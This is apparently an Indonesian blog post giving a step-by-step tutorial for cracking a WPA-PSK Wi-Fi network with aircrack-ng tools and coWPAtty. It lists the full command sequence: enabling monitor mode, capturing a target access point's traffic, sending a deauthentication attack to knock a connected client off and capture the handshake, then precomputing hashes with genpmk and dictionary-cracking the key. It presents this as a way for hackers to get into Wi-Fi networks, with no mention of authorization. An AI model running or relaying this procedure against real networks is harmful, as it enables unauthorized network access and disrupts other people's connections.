COWPAtty adalah tool hacking Wifi yang mampu melakukan cracking
pada fitur keamanan WPA-PSK dan digunakan hacker untuk bisa masuk dengan aman
pada area Wifi. COWPAtty mempunyai banyak pilihan yang berbeda dari file
dictionary dan mencocokan apakah sesuai dengan key yang terdifinisi.
kali ini saya akan membahas mengenai cara melakukan crack wiffi dengan cowpatty , sebenarnya langkah-langkah untuk hacking wireless wpa dan wpe sudah banyak di bahas baik di blog ini maupun di forum..
Langsung saja …….
- Cek Support Interface
langkah pertama tentu saja kita membutuhkan interface wireless yang support terhadap mode monitor
cek kompetibilitas wireless
Code:
root@nindya-putri:~# airmon-ng
sip dilihat dari hasil di atas berarti interface wireless berbasis pada wlan0 telah support dengan mode monitor ..
- MODE MONITOR
Selanjutnya kita mengaktifkan mode monitor pada wlan0.
Code:
root@nindya-putri:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)
Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0.
- Berikutnya
Kita harus menangkap (dump) traffik pada akses point target dan lalu
lintas paket data antara AP dan client yang sedang terkoneksi , sebelumnya
saya melakukan information gathering untuk mengetahui beberapa spesifikasi
target yang di butuhkan.
Code:
root@nindya-putri:~# airodump-ng mon0
Ok yang perlu kita catat dari pengumpulan informasi data yang di perlukan adalah ( dalam kasus saya )
a. bssid AP = 00:1E:C1:4C:BF:F8
b. channel = 11
c. ENC = WPA
d. SSID = ibteam-3g
- AIRODUMP-NG
Selanjutnya saya melakukan dump trafik data antara client terkonek dan Akses point (AP)
Code:
root@nindya-putri:~# airodump-ng --bssid
00:1E:C1:4C:BF:F8 -w dump_traf1 -c 11 mon0
saya jelaskan sedikit mengenai -w dump_traf1 ..parameter ini berfungsi untuk membuat suatu file hasil capture dan dump trafik tadi, dump_traf1 adalah nama file yang saya pilih anda bebas memilih nama lain sesuka hati anda. Dan file tersebut nantinya akan berekstension .cap. Tentu saja file tersebut akan di buat pada lokasi direktori dimana anda memulai perintah airodump.
- Handshake
Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:99:60:F3. Kita gunakan fasilitas aireply untuk melakukan deauth attack.
Code:
root@nindya-putri:~# aireplay-ng --deauth 1 -a
00:1E:C1:4C:BF:F8 -c F4:EC:38:99:60:F3 mon0
ok perhatikan pada gambar di bawah ini , bahwa setelah aireplay-ng di esekusi kita mendapatkan handshake .. karena dalam keadaan terenskripsi , time to crack it !!
- cowpatty action
Ok kita sudah di pastikan mendapat file capture handshake yang tersimpan pada direktori di mana anda memulai capturing dengan airodump tadi. masih ingatkan tadi saya simpan dengan nama dump_traf1 akan tersimpan otomatis dengan nama dump_traff1-01.cap.
Untuk melakukan crack kita membutuhkan file hash (genpmk)
Code:
root@nindya-putri:~# genpmk -f pass.txt -d
tes_genpmk_hash_wpa -s ibteam-3g -v
oh iya jgn lupa bahwa anda membutuhkan password list (dictionary) .. yang nantinya menjadi nilai dari parameter -f. Pada kasus saya kali ini saya telah menyiapkan password list dalam folder yang sama.saatnya kita mengolah file-file baik hasil capture, hashing dan password list dengan cowpatty.
Code:
cowpatty -s ibteam-3g -f pass.txt -d
tes_genpmk_hash_wpa -r dump_traf1-01.cap -v
Quote:dimana parameternya
-s ( ssid AP target )
-f ( lokasi file password list dictionary )
-d ( hasil hashing password list dictionary dengan genpmk )
-r ( hasil capturing handshadke dengan airdump )
-v ( verbose output )
-s ( ssid AP target )
-f ( lokasi file password list dictionary )
-d ( hasil hashing password list dictionary dengan genpmk )
-r ( hasil capturing handshadke dengan airdump )
-v ( verbose output )
ok kita lihat sebenarnya hal tersebut tidaklah sesulit yang anda duga. pada gambar sudah tampak hasil cracking enskripsi wpa dari cowpatty.
0 comments:
Post a Comment